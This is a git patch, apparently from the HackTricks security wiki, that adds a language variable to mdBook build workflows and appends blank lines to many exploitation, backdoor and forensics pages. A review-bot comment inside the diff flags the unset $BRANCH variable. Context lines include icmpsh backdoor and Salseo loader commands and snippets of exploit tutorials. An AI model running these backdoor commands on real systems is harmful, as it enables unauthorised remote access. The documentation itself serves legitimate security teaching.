From 61aa4fc5ee7a2cc510e25d47c136850dea24068b Mon Sep 17 00:00:00 2001 
From: Carlos Polop Date: Thu, 2 Jan 2025 21:57:43 +0100 Subject: [PATCH] translations 4 --- .github/workflows/build_master.yml | 2 +- .github/workflows/translate_af.yml | 2 +- .github/workflows/translate_de.yml | 2 +- .github/workflows/translate_el.yml | 2 +- .github/workflows/translate_es.yml | 2 +- .github/workflows/translate_fr.yml | 2 +- .github/workflows/translate_in.yml | 2 +- .github/workflows/translate_it.yml | 2 +- .github/workflows/translate_ja.yml | 2 +- .github/workflows/translate_ko.yml | 2 +- .github/workflows/translate_pl.yml | 2 +- .github/workflows/translate_pt.yml | 2 +- .github/workflows/translate_sr.yml | 2 +- .github/workflows/translate_sw.yml | 2 +- .github/workflows/translate_tr.yml | 2 +- .github/workflows/translate_uk.yml | 2 +- .github/workflows/translate_zh.yml | 2 +- src/backdoors/icmpsh.md | 2 + src/backdoors/salseo.md | 2 + src/banners/hacktricks-training.md | 2 + .../arbitrary-write-2-exec/README.md | 2 + .../aw2exec-__malloc_hook.md | 2 + .../arbitrary-write-2-exec/aw2exec-got-plt.md | 2 + .../www2exec-.dtors-and-.fini_array.md | 2 + .../arbitrary-write-2-exec/www2exec-atexit.md | 2 + src/binary-exploitation/array-indexing.md | 2 + .../README.md | 2 + .../elf-tricks.md | 2 + .../tools/README.md | 2 + .../tools/pwntools.md | 2 + .../README.md | 2 + .../aslr/README.md | 2 + .../aslr/ret2plt.md | 2 + .../aslr/ret2ret.md | 2 + .../cet-and-shadow-stack.md | 2 + .../libc-protections.md | 2 + .../memory-tagging-extension-mte.md | 2 + .../no-exec-nx.md | 2 + .../pie/README.md | 2 + .../pie/bypassing-canary-and-pie.md | 2 + .../relro.md | 2 + .../stack-canaries/README.md | 2 + .../bf-forked-stack-canaries.md | 2 + .../stack-canaries/print-stack-canary.md | 2 + .../common-exploiting-problems.md | 2 + .../format-strings/README.md | 12 +---- .../format-strings-arbitrary-read-example.md | 2 + .../format-strings/format-strings-template.md | 2 + src/binary-exploitation/integer-overflow.md | 2 + src/binary-exploitation/ios-exploiting.md | 2 + 
src/binary-exploitation/libc-heap/README.md | 2 + .../libc-heap/bins-and-memory-allocations.md | 2 + .../libc-heap/double-free.md | 2 + .../libc-heap/fast-bin-attack.md | 2 + .../libc-heap/heap-memory-functions/README.md | 2 + .../libc-heap/heap-memory-functions/free.md | 2 + .../heap-functions-security-checks.md | 2 + .../malloc-and-sysmalloc.md | 2 + .../libc-heap/heap-memory-functions/unlink.md | 2 + .../libc-heap/heap-overflow.md | 2 + .../libc-heap/house-of-einherjar.md | 2 + .../libc-heap/house-of-force.md | 2 + .../libc-heap/house-of-lore.md | 2 + .../libc-heap/house-of-orange.md | 2 + .../libc-heap/house-of-rabbit.md | 2 + .../libc-heap/house-of-roman.md | 2 + .../libc-heap/house-of-spirit.md | 2 + .../libc-heap/large-bin-attack.md | 2 + .../libc-heap/off-by-one-overflow.md | 2 + .../libc-heap/overwriting-a-freed-chunk.md | 2 + .../libc-heap/tcache-bin-attack.md | 2 + .../libc-heap/unlink-attack.md | 2 + .../libc-heap/unsorted-bin-attack.md | 2 + .../libc-heap/use-after-free/README.md | 2 + .../libc-heap/use-after-free/first-fit.md | 2 + .../rop-return-oriented-programing/README.md | 2 + .../brop-blind-return-oriented-programming.md | 2 + .../rop-return-oriented-programing/ret2csu.md | 2 + .../ret2dlresolve.md | 2 + .../ret2esp-ret2reg.md | 2 + .../ret2lib/README.md | 2 + .../ret2lib/one-gadget.md | 2 + .../ret2lib/ret2lib-+-printf-leak-arm64.md | 2 + .../rop-leaking-libc-address/README.md | 2 + .../rop-leaking-libc-template.md | 8 +--- .../ret2vdso.md | 2 + .../rop-syscall-execv/README.md | 2 + .../rop-syscall-execv/ret2syscall-arm64.md | 2 + .../README.md | 2 + .../srop-arm64.md | 2 + .../stack-overflow/README.md | 2 + .../stack-overflow/pointer-redirecting.md | 2 + .../stack-overflow/ret2win/README.md | 2 + .../stack-overflow/ret2win/ret2win-arm64.md | 2 + .../stack-pivoting-ebp2ret-ebp-chaining.md | 2 + .../stack-overflow/stack-shellcode/README.md | 2 + .../stack-shellcode/stack-shellcode-arm64.md | 2 + .../stack-overflow/uninitialized-variables.md | 2 
+ ...windows-exploiting-basic-guide-oscp-lvl.md | 2 + .../README.md | 2 + .../blockchain-and-crypto-currencies.md | 2 + src/crypto-and-stego/certificates.md | 18 +------ .../cipher-block-chaining-cbc-mac-priv.md | 2 + src/crypto-and-stego/crypto-ctfs-tricks.md | 2 + .../cryptographic-algorithms/README.md | 2 + .../unpacking-binaries.md | 2 + .../electronic-code-book-ecb.md | 2 + src/crypto-and-stego/esoteric-languages.md | 2 + .../hash-length-extension-attack.md | 2 + src/crypto-and-stego/padding-oracle-priv.md | 5 +- .../rc4-encrypt-and-decrypt.md | 2 + src/crypto-and-stego/stego-tricks.md | 2 + src/cryptography/certificates.md | 18 +------ .../cipher-block-chaining-cbc-mac-priv.md | 2 + src/cryptography/crypto-ctfs-tricks.md | 2 + src/cryptography/electronic-code-book-ecb.md | 2 + .../hash-length-extension-attack.md | 2 + src/cryptography/padding-oracle-priv.md | 6 +-- src/cryptography/rc4-encrypt-and-decrypt.md | 2 + src/emails-vulns.md | 1 + .../linux-exploiting-basic-esp/README.md | 2 + .../linux-exploiting-basic-esp/fusion.md | 2 + src/exploiting/tools/README.md | 2 + src/exploiting/tools/pwntools.md | 2 + ...windows-exploiting-basic-guide-oscp-lvl.md | 2 + .../basic-forensic-methodology/README.md | 2 + .../anti-forensic-techniques.md | 8 +--- .../docker-forensics.md | 12 +---- .../file-integrity-monitoring.md | 2 + .../linux-forensics.md | 38 --------------- .../malware-analysis.md | 2 + .../memory-dump-analysis/README.md | 14 +----- .../partitions-file-systems-carving/README.md | 2 + .../file-data-carving-recovery-tools.md | 2 + .../file-data-carving-tools.md | 2 + .../pcap-inspection/README.md | 20 +------- .../usb-keyboard-pcap-analysis.md | 2 + .../pcap-inspection/usb-keystrokes.md | 2 + .../pcap-inspection/wifi-pcap-analysis.md | 2 + .../.pyc.md | 12 +---- .../README.md | 2 + .../browser-artifacts.md | 18 +------ .../desofuscation-vbs-cscript.exe.md | 2 + .../local-cloud-storage.md | 17 +------ .../office-file-analysis.md | 17 +------ 
.../pdf-file-analysis.md | 10 +--- .../png-tricks.md | 2 + .../video-and-audio-file-analysis.md | 12 +---- .../zips-tricks.md | 2 + .../windows-forensics/README.md | 8 +--- .../interesting-windows-registry-keys.md | 2 + .../windows-forensics/windows-processes.md | 2 + src/generic-hacking/brute-force.md | 37 --------------- src/generic-hacking/exfiltration.md | 2 + src/generic-hacking/reverse-shells/README.md | 2 + .../expose-local-to-the-internet.md | 2 + .../reverse-shells/full-ttys.md | 14 +----- src/generic-hacking/reverse-shells/linux.md | 2 + .../reverse-shells/msfvenom.md | 32 +------------ src/generic-hacking/reverse-shells/windows.md | 2 + src/generic-hacking/search-exploits.md | 17 +------ .../tunneling-and-port-forwarding.md | 2 + .../basic-forensic-methodology/README.md | 2 + .../anti-forensic-techniques.md | 2 + .../docker-forensics.md | 12 +---- .../file-integrity-monitoring.md | 2 + .../image-acquisition-and-mount.md | 8 +--- .../linux-forensics.md | 37 --------------- .../malware-analysis.md | 2 + .../memory-dump-analysis/README.md | 14 +----- .../volatility-cheatsheet.md | 25 +--------- .../partitions-file-systems-carving/README.md | 2 + .../file-data-carving-recovery-tools.md | 2 + .../pcap-inspection/README.md | 20 +------- .../pcap-inspection/dnscat-exfiltration.md | 2 + .../suricata-and-iptables-cheatsheet.md | 2 + .../pcap-inspection/usb-keystrokes.md | 2 + .../pcap-inspection/wifi-pcap-analysis.md | 2 + .../pcap-inspection/wireshark-tricks.md | 2 + .../.pyc.md | 12 +---- .../README.md | 2 + .../browser-artifacts.md | 17 +------ .../desofuscation-vbs-cscript.exe.md | 2 + .../local-cloud-storage.md | 17 +------ .../office-file-analysis.md | 17 +------ .../pdf-file-analysis.md | 10 +--- .../png-tricks.md | 2 + .../video-and-audio-file-analysis.md | 2 + .../zips-tricks.md | 2 + .../windows-forensics/README.md | 2 + .../interesting-windows-registry-keys.md | 2 + .../external-recon-methodology/README.md | 15 +----- .../github-leaked-secrets.md | 5 
+- .../wide-source-code-search.md | 2 + .../pentesting-methodology.md | 12 +---- .../pentesting-network/README.md | 8 +--- .../pentesting-network/dhcpv6.md | 2 + .../pentesting-network/eigrp-attacks.md | 2 + .../glbp-and-hsrp-attacks.md | 8 +--- .../pentesting-network/ids-evasion.md | 12 +---- .../lateral-vlan-segmentation-bypass.md | 2 + .../network-protocols-explained-esp.md | 2 + .../pentesting-network/nmap-summary-esp.md | 8 +--- .../pentesting-network/pentesting-ipv6.md | 2 + ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 2 + .../spoofing-ssdp-and-upnp-devices.md | 2 + .../pentesting-network/webrtc-dos.md | 2 + .../pentesting-wifi/README.md | 47 +------------------ .../pentesting-wifi/evil-twin-eap-tls.md | 8 +--- .../phishing-methodology/README.md | 2 + .../phishing-methodology/clone-a-website.md | 8 +--- .../phishing-methodology/detecting-phising.md | 2 + .../phishing-documents.md | 2 + .../python/README.md | 17 +------ .../python/basic-python.md | 2 + .../python/bruteforce-hash-few-chars.md | 2 + .../python/bypass-python-sandboxes/README.md | 16 +------ .../load_name-load_const-opcode-oob-read.md | 2 + ...s-pollution-pythons-prototype-pollution.md | 2 + .../python/pyscript.md | 2 + .../python/python-internal-read-gadgets.md | 2 + .../python/venv.md | 17 +------ .../python/web-requests.md | 17 +------ .../threat-modeling.md | 2 + .../escaping-from-gui-applications.md | 2 + .../firmware-analysis/README.md | 2 + .../firmware-analysis/bootloader-testing.md | 2 + .../firmware-analysis/firmware-integrity.md | 2 + .../physical-attacks.md | 2 + src/interesting-http.md | 1 + .../bypass-bash-restrictions/README.md | 20 ++------ .../README.md | 12 +---- .../ddexec.md | 2 + src/linux-hardening/freeipa-pentesting.md | 2 + .../linux-environment-variables.md | 2 + .../linux-post-exploitation/README.md | 2 + .../pam-pluggable-authentication-modules.md | 2 + .../linux-privilege-escalation-checklist.md | 32 +------------ .../privilege-escalation/cisco-vmanage.md | 2 + 
.../containerd-ctr-privilege-escalation.md | 2 + ...-command-injection-privilege-escalation.md | 2 + .../electron-cef-chromium-debugger-abuse.md | 2 + .../escaping-from-limited-bash.md | 2 + .../privilege-escalation/euid-ruid-suid.md | 12 +---- src/linux-hardening/useful-linux-commands.md | 23 --------- src/online-platforms-with-api.md | 1 + src/other-web-tricks.md | 16 +------ src/pentesting-dns.md | 2 + src/post-exploitation.md | 2 + ...itive-information-disclosure-from-a-web.md | 2 + .../dll-hijacking/README.md | 10 ---- 251 files changed, 473 insertions(+), 783 deletions(-)
diff --git a/.github/workflows/build_master.yml b/.github/workflows/build_master.yml
index 4ef1dbe77..cb330988f 100644
--- a/.github/workflows/build_master.yml
+++ b/.github/workflows/build_master.yml
@@ -47,7 +47,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=en mdbook build
 # Cat hacktricks-preprocessor.log
 #- name: Cat hacktricks-preprocessor.log
diff --git a/.github/workflows/translate_af.yml b/.github/workflows/translate_af.yml
index 804afe44d..512d02907 100644
--- a/.github/workflows/translate_af.yml
+++ b/.github/workflows/translate_af.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_de.yml b/.github/workflows/translate_de.yml
index 2f83fefa1..081b1fe5b 100644
--- a/.github/workflows/translate_de.yml
+++ b/.github/workflows/translate_de.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_el.yml b/.github/workflows/translate_el.yml
index 8857a75b9..4cae868bd 100644
--- a/.github/workflows/translate_el.yml
+++ b/.github/workflows/translate_el.yml
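Review bot: `$BRANCH` is expanded without a fallback in the added `run:` line, so if the variable is unset or empty the step silently runs `MDBOOK_BOOK__LANGUAGE= mdbook build` and a book with the wrong language configuration is produced and, judging by the following "Configure AWS credentials using OIDC" step, presumably deployed, instead of the job failing fast; `run: MDBOOK_BOOK__LANGUAGE="${BRANCH:?BRANCH is not set}" mdbook build` turns the missing value into a hard error. Where `BRANCH` is assigned lies outside this hunk; if it comes from a `${{ … }}` expression, keep that assignment in the step or job `env:` mapping rather than interpolating the expression into the shell script. The identical line is added to the other fifteen translate_*.yml workflows in this patch (de, el, es, fr, in, it, ja, ko, pl, pt, sr, sw, tr, uk, zh) and the same change applies to each of them.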
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_es.yml b/.github/workflows/translate_es.yml
index 8322446a9..0d81e3175 100644
--- a/.github/workflows/translate_es.yml
+++ b/.github/workflows/translate_es.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_fr.yml b/.github/workflows/translate_fr.yml
index 046fe3b20..7e27b66c7 100644
--- a/.github/workflows/translate_fr.yml
+++ b/.github/workflows/translate_fr.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_in.yml b/.github/workflows/translate_in.yml
index c9c285a44..f2a65762a 100644
--- a/.github/workflows/translate_in.yml
+++ b/.github/workflows/translate_in.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_it.yml b/.github/workflows/translate_it.yml
index b5b4ec27c..48d315648 100644
--- a/.github/workflows/translate_it.yml
+++ b/.github/workflows/translate_it.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_ja.yml b/.github/workflows/translate_ja.yml
index 9c635e1da..f3f385960 100644
--- a/.github/workflows/translate_ja.yml
+++ b/.github/workflows/translate_ja.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_ko.yml b/.github/workflows/translate_ko.yml
index d39c84266..d031b5dd1 100644
--- a/.github/workflows/translate_ko.yml
+++ b/.github/workflows/translate_ko.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_pl.yml b/.github/workflows/translate_pl.yml
index 0dd53dd0c..dd879f8f8 100644
--- a/.github/workflows/translate_pl.yml
+++ b/.github/workflows/translate_pl.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_pt.yml b/.github/workflows/translate_pt.yml
index e8842d728..d65db16a9 100644
--- a/.github/workflows/translate_pt.yml
+++ b/.github/workflows/translate_pt.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_sr.yml b/.github/workflows/translate_sr.yml
index 4f80bc8d3..7eb6dba86 100644
--- a/.github/workflows/translate_sr.yml
+++ b/.github/workflows/translate_sr.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_sw.yml b/.github/workflows/translate_sw.yml
index 4c63a2558..f97da69cf 100644
--- a/.github/workflows/translate_sw.yml
+++ b/.github/workflows/translate_sw.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml
index 13571575b..a8f74f42e 100644
--- a/.github/workflows/translate_tr.yml
+++ b/.github/workflows/translate_tr.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_uk.yml b/.github/workflows/translate_uk.yml
index 4991a185c..dab19b876 100644
--- a/.github/workflows/translate_uk.yml
+++ b/.github/workflows/translate_uk.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/.github/workflows/translate_zh.yml b/.github/workflows/translate_zh.yml
index ed59a8d34..67f7e16e5 100644
--- a/.github/workflows/translate_zh.yml
+++ b/.github/workflows/translate_zh.yml
@@ -105,7 +105,7 @@ jobs:
 # Build the mdBook
 - name: Build mdBook
- run: mdbook build
+ run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
 # Login in AWs
 - name: Configure AWS credentials using OIDC
diff --git a/src/backdoors/icmpsh.md b/src/backdoors/icmpsh.md
index 6c48091a3..440187885 100644
--- a/src/backdoors/icmpsh.md
+++ b/src/backdoors/icmpsh.md
@@ -29,3 +29,5 @@ icmpsh.exe -t -d 500 -b 30 -s 128
 ```
 {{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/backdoors/salseo.md b/src/backdoors/salseo.md
index 90cf5338c..e1bb3be54 100644
--- a/src/backdoors/salseo.md
+++ b/src/backdoors/salseo.md
@@ -176,3 +176,5 @@ rundll32.exe SalseoLoader.dll,main
 ```
 {{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
index b03deaf4a..8145bf83f 100644
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@@ -11,3 +11,5 @@
 > - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 >
 >
+
+
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/README.md b/src/binary-exploitation/arbitrary-write-2-exec/README.md
index 117d2440a..3bec4cf45 100644
--- a/src/binary-exploitation/arbitrary-write-2-exec/README.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md
@@ -1,3 +1,5 @@
 # Arbitrary Write 2 Exec
+
+
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
index 7bd874ca8..bbf5c78db 100644
--- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md
@@ -70,3 +70,5 @@ Now a **fast bin attack** is performed:
 - [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md).
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
index ad09ee48e..28450c1bf 100644
--- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -87,3 +87,5 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
 - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook)
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md
index 31e45fba4..bf34e78a4 100644
--- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md
@@ -54,3 +54,5 @@ In order to abuse **`.fini_array`** to get an eternal loop you can [**check what
 > In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also.
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md
index 97c286231..9ecd83bb1 100644
--- a/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md
+++ b/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md
@@ -236,3 +236,5 @@ To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and th
 You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure).
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/array-indexing.md b/src/binary-exploitation/array-indexing.md
index 675eb939e..6f4531c37 100644
--- a/src/binary-exploitation/array-indexing.md
+++ b/src/binary-exploitation/array-indexing.md
@@ -16,3 +16,5 @@ However he you can find some nice **examples**:
 - 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used.
 - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
 - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).
+
+
diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
index a5e59ae40..87416ec21 100644
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md
@@ -109,3 +109,5 @@ Something to take into account is that usually **just one exploitation of a vuln
 - [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md
index f5886ddcc..e353de7b6 100644
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md
@@ -394,3 +394,5 @@ Each variable will hace an entry in the TLS header specifying the size and the T
 The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module.
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md
index 70aa57cc5..471c0c1e1 100644
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md
@@ -239,3 +239,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
 ![](<../../../images/image (858).png>)
 {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md
index 6175aeaa2..c695e9b51 100644
--- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md
+++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md
@@ -174,3 +174,5 @@ pwn update
 ```
 {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md
index 47681ba71..4b67a7fc2 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md
@@ -33,3 +33,5 @@ gdb /path/to/executable /path/to/core_file
 This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash.
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
index e33c7a3be..ec26e6da5 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md
@@ -302,3 +302,5 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
 {{#endref}}
 {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md
index c0e55129b..18e620c42 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md
@@ -80,3 +80,5 @@ p.interactive()
 - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.
 {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md
index 19f39dac3..a2e523625 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2ret.md
@@ -31,3 +31,5 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md)
 {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
index 22e1edbc2..4f9b14258 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/cet-and-shadow-stack.md
@@ -23,3 +23,5 @@ The **shadow stack** is a **dedicated stack used solely for storing return addre
 - The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding.
 {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md
index cacfd7f2f..0888a0db8 100644
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/libc-protections.md
@@ -82,3 +82,5 @@ Pointer guard is an exploit mitigation technique used in glibc to protect stored
 - [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1)
 {{#include ../../banners/hacktricks-training.md}}
+
+
